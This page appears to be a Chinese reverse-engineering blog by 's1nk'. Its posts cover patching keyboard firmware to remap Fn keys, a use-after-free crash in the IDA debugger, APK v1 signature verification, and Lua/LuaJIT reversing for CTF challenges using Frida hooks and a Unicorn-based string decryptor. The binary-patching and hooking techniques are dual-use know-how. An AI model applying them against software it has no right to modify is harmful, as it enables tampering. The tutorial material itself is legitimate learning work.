    __android_log_print(ANDROID_LOG_ERROR, "s1nk", "injected by s1nk");

    return JNI_VERSION_1_6;
}

iMK 键盘逆向

s1nk — Sun, 25 Aug 2024 16:00:00 GMT

00. 背景

买的键盘不支持 VIA，改建只能找客服，这家店的技术有点忙，还有点傻。等了三天，没给我改成功 🤬，哥们是什么善茬吗？直接 Ghidra 启动！

详情

01. 基本按键映射修改

芯片是南京沁恒的 CH582 ，用的一个32位的RISC处理器，支持RV32IMAC指令集。客服给的固件是 intel hex 格式的，肯定是没有任何符号信息了，但是根据字符串拿官方库 bindiff 固件可以恢复 90% 的符号。

研究了一下，代码都是从第一行指令开始执行，最开始的代码都是把一堆东西映射到 0x20000000 这个地址，这个地址应该是 RAM 地址，为了把常用的东西放到 RAM 里提升效率，代码里看到 0x20000000 的地址自己映射一下就行了，本文实际上没用到，不再展开。

基本按键映射比较简单，一般来说都有一个数组来保存像这样，所以修改基本按键映射应该不用分析

我尝试搜索 14 26 08 15 17 (即，QWERT）但是搜索不到，拿到原版和修改版之后 diff 一下。

0x40（这个键实际上是右边的 alt） → 0x35（~`）

0x20（这个键实际上是右边的shift） → 0x40（F7）

0x4C（DEL） → 0x41（F8）

提取出来之后发现是按列存储的，如下图

其中红色的部分是键盘中不包含的按键，未知按键中 0xfe 为Fn，其他的按下图中解释即可。

这里上图中的 8 个并不是正常的 value，在协议中和正常的按键位置不同，所以在代码中必然有针对他们的判断，配置好内存映射，直接交叉引用就看到了。

逻辑基本上就是判断位置，这里我们把要修改成不是控制按键的地方全都改成 0xff 让他永远都不成立就行了。

剩下的修改基本按键映射，修改这个数组中的对应位置即可。

02. Fn 组合键修改

基本按键映射修改好了，但是更关键的是组合键。为此，我看了一下 Github 上一些开源键盘的 Fn 组合键的实现方式，一般是类似基本按键也有一个映射表。如果是这样就简单了，和上面类似只需要diff 一下找到这个映射表，对着修改就行了，但是很不幸这个开发者没有这样做。

要分析代码实现了吗？有点绝望，突然发现一个字符串 f12_deal 这不就是我要找的 Fn 组合键处理逻辑吗！因为这是一个左移 64 的小键盘没有 f1 - f12 ，需要用 Fn + 数字键实现。

f12_deal 这个没有找到交叉引用（使用 Binary Ninja 查看有交叉引用），但是和它相邻的 f10_deal 有。直接跟过去看看：

发现相邻的很多函数都是 Fn 组合键处理逻辑，但是这些函数找交叉引用都找不到，合理怀疑是用函数指针调用的，因为一般实现都是有个表，直接 010 Editor 搜一下：

很明显的结构：

strcut fn_layer_handler {
    uint32_t idx;
  void* fn_ptr;
};

fn_layer_handler fn_layer_handler_arr[32];

交叉引用看看对这个表的处理，首先是对 fn_layer 所支持按键的扫描处理：

其中 fn_layer_key 是我自己命名的名字，数据是一堆 key-code。把里面的数据拿出来，根据卖键盘的给我的说明书翻译一下，刚好包含了说明书里的所有 Fn 组合键。

Keyboard w and W   -- 2.4g 无线模式
Keyboard e and E   -- 蓝牙模式
Keyboard q and Q   -- 有线模式
Keyboard k and K   -- Mac/Win 切换
Keyboard t and T   -- 配对2.4g
Keyboard / and ?   -- 静音
Keyboard , and <   -- 音量减     
Keyboard . and >   -- 音量加
Keyboard z and Z   -- RGB 灯开关 
Keyboard x and X   -- RGB 灯模式+
Keyboard c and C   -- RGB 灯模式-
Keyboard v and V   -- RGB 灯速度变化
Keyboard b and B   -- 开启默认随机灯效模式
Keyboard n and N   -- 开启/关闭电磁阀
Keyboard m and M   -- 开启/关闭蜂鸣器
Keyboard 1 and !   -- 以下为 F1 -- F12
Keyboard 2 and @
Keyboard 3 and #
Keyboard 4 and $
Keyboard 5 and %
Keyboard 6 and ∧
Keyboard 7 and &
Keyboard 8 and *
Keyboard 9 and (
Keyboard 0 and )
Keyboard - and (underscore)
Keyboard = and +
Keyboard ESCAPE   -- ~`键
Keyboard a and A  -- 长按换第一个蓝牙设备
Keyboard s and S  -- 长按换第二个蓝牙设备
Keyboard d and D  -- 长按换第三个蓝牙设备
Keyboard f and F  -- 长按换第四个蓝牙设备

扫描完之后就是处理了，和说明书里对应的非常完美刚好是最后 4 个是长按。

这就比较明朗了，只需要修改 fn_layer_key 数组里的值和对应位置的 fn_layer_handler_arr 的函数的实现即可实现对 Fn 层快捷键的 VIA。

03. Patch 实现

keystone 不支持 RISC-V，直接用编译器生成。

然后修改一下 ld 文件，把 .patch_code 段放到指定地址，然后提出来直接用即可。

下面是完整实现

from HID_const import *
import struct

def write_byte(file, addr, value):
    file.seek(addr)
    file.write(struct.pack(', value))

def write_dword(file, addr, value):
    file.seek(addr)
    file.write(struct.pack(', value))

def disable_rshift(file):
    file.seek(0x729c + 2)
    file.write(bytes.fromhex('f00f'))

def disable_ralt(file):
    file.seek(0x728a + 2)
    file.write(bytes.fromhex('f00f'))

keymap_offset = 0x32ca4
fn_layer_key_arr_offset = 0x30de0
fn_layer_handler_arr_offset = 0x30cc8

with open('./3M_2X', 'rb') as f:
    content = bytearray(f.read())

patched_f = open('./3M_2X_patched', 'wb')
patched_f.write(content)  # 写入原始内容

# 对基础按键的修改
disable_ralt(patched_f)
write_byte(patched_f, keymap_offset + 7 * 9 + 7 - 1, HID_KEYBOARD_GRV_ACCENT)
disable_rshift(patched_f)
write_byte(patched_f, keymap_offset + 7 * 11 + 6 - 1, HID_KEYBOARD_F7)
write_byte(patched_f, keymap_offset + 7 * 13 + 6 - 1, HID_KEYBOARD_F8)

# 对 fn_layer 的修改
write_byte(patched_f, fn_layer_key_arr_offset + 8, HID_KEYBOARD_GRV_ACCENT)
write_byte(patched_f, fn_layer_key_arr_offset + 9, HID_KEYBOARD_LEFT_ARROW)
write_byte(patched_f, fn_layer_key_arr_offset + 10, HID_KEYBOARD_RIGHT_ARROW)
write_byte(patched_f, fn_layer_key_arr_offset + 11, HID_KEYBOARD_UP_ARROW)
write_byte(patched_f, fn_layer_key_arr_offset + 12, HID_KEYBOARD_DOWN_ARROW)
write_byte(patched_f, fn_layer_key_arr_offset + 28, HID_KEYBOARD_LEFT_BRKT)
write_byte(patched_f, fn_layer_key_arr_offset + 29, HID_KEYBOARD_RIGHT_BRKT)
write_byte(patched_f, fn_layer_key_arr_offset + 30, HID_KEYBOARD_SEMI_COLON)
write_byte(patched_f, fn_layer_key_arr_offset + 31, HID_KEYBOARD_SGL_QUOTE)

# 对 修改映射和功能的
# Insert
write_byte(patched_f, fn_layer_key_arr_offset + 27, HID_KEYBOARD_I)
# 修改 fn_layer_handler_arr[27] 为输入 Insert
handler_insert_addr = 0x33000
write_dword(patched_f, fn_layer_handler_arr_offset + 27 * 8 + 4, handler_insert_addr)

# Delete
write_byte(patched_f, fn_layer_key_arr_offset + 13, HID_KEYBOARD_D)
# 修改 fn_layer_handler_arr[13] 为输入 Delete
handler_delete_addr = 0x3305e
write_dword(patched_f, fn_layer_handler_arr_offset + 13 * 8 + 4, handler_delete_addr)

# PrintScreen
write_byte(patched_f, fn_layer_key_arr_offset + 14, HID_KEYBOARD_P)
# 修改 fn_layer_handler_arr[14] 为输入 PrintScreen
handler_print_screen_addr = 0x330bc
write_dword(patched_f, fn_layer_handler_arr_offset + 14 * 8 + 4, handler_print_screen_addr)

# 插入代码
patched_f.seek(0x33000)
code = bytes.fromhex("""
01 11 06 CE 22 CC 26 CA 83 07 15 00 02 C2 02 C4
23 06 01 00 A1 E3 83 07 05 00 89 C7 93 07 90 04
A3 03 F1 00 25 64 B7 74 00 20 93 07 44 4F 13 85
84 83 82 97 A1 47 63 FF A7 00 05 46 4C 00 13 85
84 83 13 04 A4 53 02 94 21 46 93 05 51 00 13 85
84 83 02 94 F2 40 62 44 D2 44 05 61 82 80 01 11
06 CE 22 CC 26 CA 83 07 15 00 02 C2 02 C4 23 06
01 00 A1 E3 83 07 05 00 89 C7 93 07 C0 04 A3 03
F1 00 25 64 B7 74 00 20 93 07 44 4F 13 85 84 83
82 97 A1 47 63 FF A7 00 05 46 4C 00 13 85 84 83
13 04 A4 53 02 94 21 46 93 05 51 00 13 85 84 83
02 94 F2 40 62 44 D2 44 05 61 82 80 01 11 06 CE
22 CC 26 CA 83 07 15 00 02 C2 02 C4 23 06 01 00
A1 E3 83 07 05 00 89 C7 93 07 60 04 A3 03 F1 00
25 64 B7 74 00 20 93 07 44 4F 13 85 84 83 82 97
A1 47 63 FF A7 00 05 46 4C 00 13 85 84 83 13 04
A4 53 02 94 21 46 93 05 51 00 13 85 84 83 02 94
F2 40 62 44 D2 44 05 61 82 80
""")
patched_f.write(code)

patched_f.close()

import intelhex

intelhex.bin2hex('./3M_2X_patched', './3M_2X_patched.hex')

Patch 完之后烧写测试发现功能和预期完全一样，不禁大喊一声：高玉灿牛逼 😋

IDA Pro 9.0 Beta2 Local Windows Debugger Crash

s1nk — Wed, 14 Aug 2024 16:00:00 GMT

问题描述

在使用 Local Windows Debugger 时，通过终止程序的方式结束调试会导致 IDA 发生 Crash.

问题分析

通过查看 dmp 文件，可以找到 Crash 发生的地方为 0x10B953

对 IDA Pro Crash 处进行调试发现，原因为 (dbg + 0x38) 处的堆块已经被释放，(*(dbg + 0x38) + rax)又被别的地方申请后设置成了 0，导致 rdx 取到的值为 0，进而导致 rdx - rbx + rbx 为 0，出现空指针异常，显然这是一个典型的 UAF 漏洞。

临时修复

在 free 函数下条件断点，发现 *(dbg + 0x38) 是在下图所示位置 free 的，在 win32_user64.dll 中的 RVA: 0x3A1C，把此处 free 调用 NOP 掉即可修复。

Android APK 签名扫盲

s1nk — Tue, 13 Feb 2024 16:00:00 GMT

前置知识

PKCS#7、X.509、DER 、PEM、数字签名、数字证书 这些都是在处理公钥加密、数字签名时，常见的一些名词，但是我一直对他们不甚了解，尤其是前面两个。下面的内容是对它们的一些介绍。

DER 和 PEM

首先，二者都是常用的用于公钥密码密钥/证书的编码方式，而且可以相互转换。

DER

DER：Distinguished Encoding Rules，可分辩编码规则。具体来说，DER 是对 ASN.1 值的一种二进制编码方式。

在电信和计算机网络领域，ASN.1（Abstract Syntax Notation One) 是一套标准，是描述数据的表示、编码、传输、解码的灵活的记法。它提供了一套正式、无歧义和精确的规则以描述独立于特定计算机硬件的对象结构。

PEM

PEM：Privacy-Enhanced Mail，隐私增强邮件。简单来说，PEM就是对DER数据进行 Base64 编码后，前后加上头。格式如下：

-----BEGIN <？？？>-----

-----END <？？？>-----

数字证书和 X.509

数字证书

数字证书是在 Internet 上唯一地标识人员和资源的电子文件。数字证书可以防止中间人攻击，具体的介绍可以看下面的链接：数字证书简介

X.509

X.509 是数字证书的一种标准格式，通俗来说就是一种数字证书的发布者、公钥等信息的组织形式。下图就是一个 X.509 格式的数字证书的内容：

数字签名和 PKCS#7

数字签名

什么是数字签名，以及它和数字证书的关系。参考：数字签名是什么？

PKCS#7

在密码学中，PKCS#7是用于存储签名或加密数据 标准语法。我个人的理解是，在传输签名后的数据时，我们传输的数据需要包括：原文、数字证书（在 PKCS#7 中就是 X.509 格式的）、签名算法（如 RSA Signature with SHA-256）、签名数据等数据，而PKCS#7 就是规定了这些数据的组织形式的一个标准。

我们可以使用 openssl 工具对 PKCS#7格式的数据，进行解析、展示：

openssl pkcs7 --inform DER -in [der 格式的签名文件路径] --print

正题

这里主要是为了解答我自己的这么几个问题：

在日常开发中，通过 PackageInfo.signatures 拿到的是什么？
Android 的签名验证机制是如何工作的？

阅读以下内容之前，请先阅读下文：Android 签名机制 v1、v2、v3

好，看完后第二个问题解决了。🤣

问题一

分析

分析源代码写的很乱，可以自己看省流

第一个问题还是不知道，通过对 Android 源代码的最终发现，PackageInfo.signatures 是在 PackageParser 这个类进行的赋值，而 PackageParser 则是使用 ApkSignatureVerifier#verify 这个方法获取的签名信息。这个类中依次尝试使用 V4、V3、V2、V1对apk 进行签名校验，我们这里挑最具通用性，也最容易理解的 V1 来进行阅读。

V1、V2、V3、V4 签名，参考 Android 官方文档：应用签名

首先，获取 apk 文件 META-INF 目录下，以 RSA、DSA、EC 为拓展名的文件，作为"证书文件"。以 CERT.RSA 为例，接下来就会获取 CERT.SF 文件内容，然后校验 CERT.SF文件内容。

前面提到了 PKCS#7，CERT.RSA 就是 PKCS#7 格式的签名数据，其中包括数字证书、签名算法（如 RSA Signature with SHA-256）、签名数据等数据，可以说除了原文该有的基本都有。而原文就是 CERT.SF 的文件内容。

然后是使用签名文件（SF 文件）检验 MF 文件没有被修改过，并把SF文件和其对应的证书链对应起来了，还有把SF文件和SF文件中所包含的文件对应起来（看起来好像是一个文件可能被多个 SF 文件包含，但是我没见过）。

private void verifyCertificate(String certFile) {
// Found Digital Sig, .SF should already have been read
String signatureFile = certFile.substring(0, certFile.lastIndexOf('.')) + ".SF";
    byte[] sfBytes = metaEntries.get(signatureFile);
    if (sfBytes == null) {
        return;
    }

    byte[] manifestBytes = metaEntries.get(JarFile.MANIFEST_NAME);
// Manifest entry is required for any verifications.
if (manifestBytes == null) {
        return;
    }

    byte[] sBlockBytes = metaEntries.get(certFile);
    try {
        Certificate[] signerCertChain = verifyBytes(sBlockBytes, sfBytes);
        if (signerCertChain != null) {
            certificates.put(signatureFile, signerCertChain);// 等下用到了
        }
    } catch (GeneralSecurityException e) {
      throw failedVerification(jarName, signatureFile, e);
    }

// Verify manifest hash in .sf file
Attributes attributes = new Attributes();
    HashMap entries = new HashMap();
    try {
        StrictJarManifestReader im = new StrictJarManifestReader(sfBytes, attributes);
        im.readEntries(entries, null);
    } catch (IOException e) {
        return;
    }

// If requested, check whether a newer APK Signature Scheme signature was stripped.
if (signatureSchemeRollbackProtectionsEnforced) {
// 无关，省了
    }

// Do we actually have any signatures to look at?
if (attributes.get(Attributes.Name.SIGNATURE_VERSION) == null) {
        return;
    }

    boolean createdBySigntool = false;
    String createdBy = attributes.getValue("Created-By");
    if (createdBy != null) {
        createdBySigntool = createdBy.indexOf("signtool") != -1;
    }

// Use .SF to verify the mainAttributes of the manifest
// If there is no -Digest-Manifest-Main-Attributes entry in .SF
// file, such as those created before java 1.5, then we ignore
// such verification.
if (mainAttributesEnd > 0 && !createdBySigntool) {
        String digestAttribute = "-Digest-Manifest-Main-Attributes";
        if (!verify(attributes, digestAttribute, manifestBytes, 0, mainAttributesEnd, false, true)) {
            throw failedVerification(jarName, signatureFile);
        }
    }

// Use .SF to verify the whole manifest.
String digestAttribute = createdBySigntool ? "-Digest" : "-Digest-Manifest";
    if (!verify(attributes, digestAttribute, manifestBytes, 0, manifestBytes.length, false, false)) {
        Iterator> it = entries.entrySet().iterator();
        while (it.hasNext()) {
            Map.Entry entry = it.next();
            StrictJarManifest.Chunk chunk = manifest.getChunk(entry.getKey());
            if (chunk == null) {
                return;
            }
            if (!verify(entry.getValue(), "-Digest", manifestBytes,
                    chunk.start, chunk.end, createdBySigntool, false)) {
                throw invalidDigest(signatureFile, entry.getKey(), jarName);
            }
        }
    }
    metaEntries.put(signatureFile, null);
    signatures.put(signatureFile, entries);// 把SF文件和SF文件中所包含的文件对应起来
}

然后，获取 AndroidManifest.xml 文件对应的 ZipEntry, 调用 loadCertificates函数，结果经过 convertToSignatures 得到的结果就是 PackageInfo.signatures

看来关键就在于 loadCertificates 这个函数了，

private static ParseResult loadCertificates(ParseInput input,
        StrictJarFile jarFile, ZipEntry entry) {
    InputStream is = null;
    try {
// We must read the stream for the JarEntry to retrieve
// its certificates.
        is = jarFile.getInputStream(entry);
        readFullyIgnoringContents(is);
        return input.success(jarFile.getCertificateChains(entry));
    } catch (IOException | RuntimeException e) {
        return input.error(INSTALL_PARSE_FAILED_UNEXPECTED_EXCEPTION,
                "Failed reading " + entry.getName() + " in " + jarFile, e);
    } finally {
        IoUtils.closeQuietly(is);
    }
}

首先是题外的，readFullyIgnoringContents 是在干什么呢？读了又不要，很奇怪吧。其实 jarFile.getInputStream 获取的是 StrictJarFile.JarFileInputStream

public InputStream getInputStream(ZipEntry ze) {
    final InputStream is = getZipInputStream(ze);

    if (isSigned) {
        StrictJarVerifier.VerifierEntry entry = verifier.initEntry(ze.getName());
        if (entry == null) {
            return is;
        }

        return new JarFileInputStream(is, ze.getSize(), entry);
    }

    return is;
}

这里还有一个比较关键的函数 initEntry，它把 MANIFEST.MF 文件的解析结果（包括摘要算法、摘要值）、对这个 entry 进行签名的证书链（一般都是自签名的就一个，也没链）列表（也就是 .SF 列表，一般来说就一个）融入到了 Entry 中。

  VerifierEntry initEntry(String name) {
// If no manifest is present by the time an entry is found,
// verification cannot occur. If no signature files have
// been found, do not verify.
if (manifest == null || signatures.isEmpty()) {
          return null;
      }

      Attributes attributes = manifest.getAttributes(name);
// entry has no digest
if (attributes == null) {
          return null;
      }

      ArrayList certChains = new ArrayList();
      Iterator>> it = signatures.entrySet().iterator();
      while (it.hasNext()) {
          Map.Entry> entry = it.next();
          HashMap hm = entry.getValue();
          if (hm.get(name) != null) {
// Found an entry for entry name in .SF file
String signatureFile = entry.getKey();
              Certificate[] certChain = certificates.get(signatureFile);
              if (certChain != null) {
                  certChains.add(certChain);
              }
          }
      }

// entry is not signed
if (certChains.isEmpty()) {
          return null;
      }
      Certificate[][] certChainsArray = certChains.toArray(new Certificate[certChains.size()][]);

      for (int i = 0; i < DIGEST_ALGORITHMS.length; i++) {
          final String algorithm = DIGEST_ALGORITHMS[i];
          final String hash = attributes.getValue(algorithm + "-Digest");
          if (hash == null) {
              continue;
          }
          byte[] hashBytes = hash.getBytes(StandardCharsets.ISO_8859_1);

          try {
              return new VerifierEntry(name, MessageDigest.getInstance(algorithm), hashBytes,
                      certChainsArray, verifiedEntries);
          } catch (NoSuchAlgorithmException ignored) {
          }
      }
      return null;
  }

而 JarFile.JarFileInputStream 的 read 方法是经过重写的

// JarFileInputStream 类
@Override
    public int read() throws IOException {
        if (done) {
            return -1;
        }
        if (count > 0) {
            int r = super.read();
            if (r != -1) {
                entry.write(r);
                count--;
            } else {
                count = 0;
            }
            if (count == 0) {
                done = true;
                entry.verify();// 关键
            }
            return r;
        } else {
            done = true;
            entry.verify();
            return -1;
        }
    }
// VerifierEntry 类
void verify() {
        byte[] d = digest.digest();
        if (!verifyMessageDigest(d, hash)) {
            throw invalidDigest(JarFile.MANIFEST_NAME, name, name);
        }
        verifiedEntries.put(name, certChains);// 把文件和对他进行签名的证书对应起来
    }

所以这个调用是为了检查 APK 中包含的所有文件，对应的摘要值与 MANIFEST.MF 文件中记录的值是否一致。

回归正题，getCertificateChains 方法获取了转换所需的 Certificate[][] ，他的很简单，其实就是从前面代码中的verifiedEntries中获取对应 entry 的 certChains。

好的总结一下，我的理解就是获取的对 AndroidManifest.xml 这个文件进行签名的证书。在一般情况下，就是 CERT.RSA 文件（PKCS#7格式）中的证书部分。

那么 convertToSignatures 做了什么呢？

  private static Signature[] convertToSignatures(Certificate[][] certs)
          throws CertificateEncodingException {
      final Signature[] res = new Signature[certs.length];
      for (int i = 0; i < certs.length; i++) {
          res[i] = new Signature(certs[i]);
      }
      return res;
  }

  public Signature(Certificate[] certificateChain) throws CertificateEncodingException {
      mSignature = certificateChain[0].getEncoded();
      if (certificateChain.length > 1) {
          mCertificateChain = Arrays.copyOfRange(certificateChain, 1, certificateChain.length);
      }
  }

/**
   * Returns the encoded form of this certificate. It is
   * assumed that each certificate type would have only a single
   * form of encoding; for example, X.509 certificates would
   * be encoded as ASN.1 DER.
   *
   * @return the encoded form of this certificate
   *
   * @exception CertificateEncodingException if an encoding error occurs.
   */
   public abstract byte[] getEncoded()
      throws CertificateEncodingException;

省流

好，PackageInfo.signatures 得到其实就是公钥数字证书转换为 DER 格式的二进制数据。

Python 可以直接用 androguard 获取，

from androguard.core.apk import APK

apk = APK('abc.apk')
signature = apk.get_certificates()[0].dump()
print(signature.hex())

注意！其提供的 get_signatures 是不对的，如下图它直接返回了签名数据的全部内容，而我们需要的只有公钥数字证书部分。

Lua 逆向总结

s1nk — Mon, 20 Nov 2023 16:00:00 GMT

Lua 逆向总的来说在 CTF 中好像并不是多么常见，印象比较深刻的可能就四次吧，第一次遇到是在 2022 年的RCTF，然后还有今年的巅峰极客、柏鹭杯和 N1CTF。分别是 luac 文件结构修改、LuaJIT、Lua VM Opcodes顺序修改、Lua VM Opcodes实现修改，基本上也概况了常见的情况了。

1. Lua 和 C 的基本交互

虽然 Lua 的源码称得上很小，但是全看还是没什么性价比，这里我们从CTF中常见的一种场景，C 语言调用 Lua 脚本中的函数开始分析，主要有这么几步：

C 语言和 Lua 的交互是通过 lua_State来实现的，所以首先需要创建一个 lua_State

把 Lua 脚本加载进 Lua 虚拟机，这里 Lua 提供了三个常用的函数

LUALIB_API int (luaL_loadstring) (lua_State *L, const char *s);

LUALIB_API int (luaL_loadbufferx) (lua_State *L, const char *buff, size_t sz, const char *name, const char *mode);
#define luaL_loadbuffer(L,s,sz,n)luaL_loadbufferx(L,s,sz,n,NULL)

LUALIB_API int (luaL_loadfilex) (lua_State *L, const char *filename, const char *mode);
#define luaL_loadfile(L,f)luaL_loadfilex(L,f,NULL)

当然，最后这三个函数最后走的都是 lua_load 函数，把经过编译（luac文件就不编译了）后的代码放在栈顶。

执行加载到栈顶的 Lua 代码，因为上述函数只是将程序加载到了栈顶，只有在执行了之后才能变成虚拟机中的函数、变量。由于代码已经在栈顶了，也没有需要传入的参数，所以只需要调用 lua_pcall 即可。
int lua_pcall (lua_State *L, int nargs, int nresults, int msgh);
对于步骤 2、3 Lua 中也提供了一套合并的函数，luaL_dofile 和 luaL_dostring
调用指定函数。调用约定如下：
首先把要调用的函数压入栈中，然后按顺序将要传入的参数压入栈中（从左到右），最后调用 lua_call (当然也可以调用 lua_pcall 等)。当函数返回时，所有的参数和要调用的函数以及被出栈了，而且函数调用的返回值被压入栈中了，返回值的数量就是传入的 nresults的值，除非传入的是 LUA_MULTRET

下面是一个简单的代码实现

#include 
#include 
#include 
#include 
#include 

/*
    function add(a, b)
    return a + b;
    end
*/
unsigned char luac_buff[] = {
    0x1b, 0x4c, 0x75, 0x61, 0x54, 0x00, 0x19, 0x93, 0x0d, 0x0a, 0x1a, 0x0a,
    0x04, 0x08, 0x08, 0x78, 0x56, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x28, 0x77, 0x40, 0x01, 0x8a, 0x40, 0x64, 0x65,
    0x6d, 0x6f, 0x2e, 0x6c, 0x75, 0x61, 0x80, 0x80, 0x00, 0x01, 0x02, 0x84,
    0x51, 0x00, 0x00, 0x00, 0x4f, 0x00, 0x00, 0x00, 0x0f, 0x00, 0x00, 0x00,
    0x46, 0x00, 0x01, 0x01, 0x81, 0x04, 0x84, 0x61, 0x64, 0x64, 0x81, 0x01,
    0x00, 0x00, 0x81, 0x80, 0x81, 0x83, 0x02, 0x00, 0x03, 0x84, 0x22, 0x01,
    0x00, 0x01, 0x2e, 0x00, 0x01, 0x06, 0x48, 0x01, 0x02, 0x00, 0x47, 0x01,
    0x01, 0x00, 0x80, 0x80, 0x80, 0x84, 0x01, 0x00, 0x00, 0x01, 0x80, 0x82,
    0x82, 0x61, 0x80, 0x84, 0x82, 0x62, 0x80, 0x84, 0x80, 0x84, 0x01, 0x02,
    0xfe, 0x02, 0x80, 0x80, 0x81, 0x85, 0x5f, 0x45, 0x4e, 0x56};

unsigned int luac_buff_len = 130;

int main(int argc, char const* argv[]) {
    // 创建 luaState
    lua_State* L = luaL_newstate();
    // 加载 luac
    if (luaL_loadbuffer(L, luac_buff, luac_buff_len, "demo.lua") ||
        lua_pcall(L, 0, LUA_MULTRET, 0)) {
        exit(-1);
    }
    // 调用函数
    lua_getglobal(L, "add");
    lua_pushnumber(L, 100);
    lua_pushnumber(L, 200);
    if (lua_pcall(L, 2, 1, 0) != LUA_OK) {
        exit(-1);
    }
    // 获取并移除返回值
    int sum = lua_tonumber(L, -1);
    lua_pop(L, 1);
    printf("sum = %d\\n", sum);
    return 0;
}

其中还有一些细节，比如 lua_tonumber(L, -1) 中 index = -1 代表的是栈顶，这里正索引表示绝对堆栈位置，从 1 开始，作为堆栈的底部；负索引表示相对于堆栈顶部的偏移量，详细可以参考官方文档的 4.1 节。

参考:
Lua5.4 Reference Manual Part4
C程序优雅地调用Lua?一篇博客带你全面了解 lua_State

2. Luac 文件结构修改

2.1 Lua 代码加载流程分析

因为我是比较喜欢 luaL_loadbufferx，所以我们还是从 luaL_loadbufferx 开始分析。整体流程如下：

luaL_loadbufferx -> lua_load -> luaD_protectedparser -> f_parser -> luaU_undump ( luac 二进制文件) | luaY_parser （lua 脚本文件，这个还没见过改的，也没看过）

整个流程代码太多了，贴出来也没什么意义，需要注意的也就从 luaD_protectedparser 调用 f_parser 是用 luaD_pcall 调用的，而不是直接调用的。一般做题目，研究这个流程也就是为了顺利跟到 luaU_undump 这个函数，进而分析 luac 文件结构修改了哪部分，是不是中间存在什么加密或者字段顺序上的调整。

2.2 通杀方法

对于这种文件结构上的调整，这里我们有一个通杀的方法，那就是在 load 完成之后，执行之前（此时加载后的程序位于栈顶），调用同版本的、标准的（也就是未经任何修改的）lua_dump 函数，即可得到标准格式的 luac文件。简单来说，先用题目给的 load 然后用标准的 dump。

这里以 2022 年 RCTF 的 picStore 作为例子，首先 Lua 的版本为 5.3.3，（直接 shift + F12 就搜索就行），先编译一个官方的，这里为了方便 dump 添加一个导出函数

static int my_writer(lua_State* L, const void* p, size_t size, void* u) {
 return (fwrite(p,size,1,(FILE*)u)!=1) && (size!=0);
}

LUA_API int luaL_dumpfile (lua_State *L, const char *filename) {
  TValue *o;
  FILE* D;
  int status;
  if (!filename || !(D = fopen(filename,"wb"))) {
    return -1;
  }
  lua_lock(L);
  api_checknelems(L, 1);
  o = L->top - 1;
  if (isLfunction(o))
    status = luaU_dump(L, getproto(o), my_writer, D, 0); // 这里不直接调用 lua_dump 函数，因为可能会调用到程序本身的
  else
    status = 1;
  lua_unlock(L);
  fclose(D);
  return status;
}

然后修改一下 src 目录里的Makefile 编译个 so 出来，

创建个变量 LUA_SO= liblua.so，位置随便
CFLAGS 后面加个 fPIC
ALL_T 后面把 $(LUA_SO)加上
写一下LUA_SO的编译参数

$(LUA_SO): $(BASE_O)
$(CC) -o $@ $(LDFLAGS) -shared $(BASE_O) $(LIBS)

重新 make 一手，拿到 liblua.so，这里Hook操作还是使用 Frida

var liblua = Module.load("/home/s1nk/CTF/rev/FridaCode/liblua.so");
var pfunc_dumpfile = liblua.findExportByName("luaL_dumpfile");
var func_dumpfile = new NativeFunction(pfunc_dumpfile, "int", ["pointer", "pointer"]);

var picStore = Process.findModuleByName("picStore");

Interceptor.attach(picStore.base.add(0x4D700), { // luaL_loadfilex func_addr
    onEnter: (args) => {
        console.log("luaL_loadfilex called");
        this.L = args[0];
    },
    onLeave: (retval) => {
        func_dumpfile(this.L, Memory.allocUtf8String("/home/s1nk/CTF/rev/FridaCode/dump.luac"));
    }
})

直接启动 frida -l ./lua_dump.js -f picStore ，然后就会发现，标准格式的 luac 已经出现了

unluac 一下就可以看到源码了

3. VM Opcodes 顺序修改

这里以 2024 年 WMCTF easy_android 为例，这是一个 LuaJIT 的题目，且打乱了 opcode 顺序。

3.1 字符串解密

这部分和 Lua 逆向无关可以直接跳过。以这个题目为例所以还是提一下，这里因为题目的字符串加密方法基本都是以 ADRL 、LDARB 指令开始，所以只需要写个脚本把字符串加密函数的都执行一遍然后把 data 段 dump 出来就行了，下面是一种实现。

from idaapi import *
from idautils import Functions
from unicorn import *
from unicorn.arm64_const import *
from capstone import *
import cle

class StringDecrypt(object):
    def __init__(self):
        self.loader = cle.Loader('D:\Coding\CaptureTheFlag\libeasyandroid.so', main_opts={'base_addr': 0})
        self.mu = Uc(UC_ARCH_ARM64, UC_MODE_ARM)
        self.cs = Cs(CS_ARCH_ARM64, CS_MODE_ARM)
        self.mu.mem_map(0, 0xC0000)
        self.mu.mem_map(0x100000, 0x10000)
        for seg in self.loader.main_object.segments:
            self.mu.mem_write(seg.vaddr, self.loader.memory.load(seg.vaddr, seg.memsize))

    def decrypt(self, func):
        def hook_code(uc: Uc, address, size, user_data):
            if print_insn_mnem(address) == 'RET':
                uc.emu_stop()
        self.mu.reg_write(UC_ARM64_REG_SP, 0x100000 + 0x5000)
        self.mu.reg_write(UC_ARM64_REG_PC, func)
        self.mu.hook_add(UC_HOOK_CODE, hook_code)
        self.mu.emu_start(func, 0xC0000)

    def patch_db(self): # patch 整个数据段
        patch_bytes(0xB6EB0, bytes(self.mu.mem_read(0xB6EB0, 0x78E8)))

if __name__ == '__main__':
    funcs = Functions(0x187D0, 0xB3F00)
    string_decrypt = StringDecrypt()
    for func in funcs:
        cur_addr = func
        while print_insn_mnem(cur_addr) == 'STP' or print_insn_mnem(cur_addr) == 'STR':
            cur_addr += 4
        if print_insn_mnem(cur_addr) == 'ADRL' and print_insn_mnem(cur_addr + 8) == 'LDARB':
            print(f'Found decrypt function at 0x{func:x}')
            string_decrypt.decrypt(func)
    string_decrypt.patch_db()

3.2 如何找到每个指令的实现逻辑

LuaJIT 的虚拟机对于每条指令的实现都是用汇编实现的，通过分析可以找到指令的分发是通过下图中的 ins_callt 实现的。

注意这三条指令，其中

add TMP1, GL, INS, uxtb #3
ldr TMP0, [TMP1, #GG_G2DISP]
br_auth TMP0

GL 是 LuaJIT 中的 Global state，可以通过 lua_State 的 glref 取得；

/* Global state, main thread and extra fields are allocated together. */
typedef struct GG_State {
  lua_State L;/* Main thread. */
  global_State g;/* Global state. */
#if LJ_TARGET_ARM && !LJ_TARGET_NX
  /* Make g reachable via K12 encoded DISPATCH-relative addressing. */
  uint8_t align1[(16-sizeof(global_State))&15];
#endif
#if LJ_TARGET_MIPS
  ASMFunction got[LJ_GOT__MAX];/* Global offset table. */
#endif
#if LJ_HASJIT
  jit_State J;/* JIT state. */
  HotCount hotcount[HOTCOUNT_SIZE];/* Hot counters. */
#if LJ_TARGET_ARM && !LJ_TARGET_NX
  /* Ditto for J. */
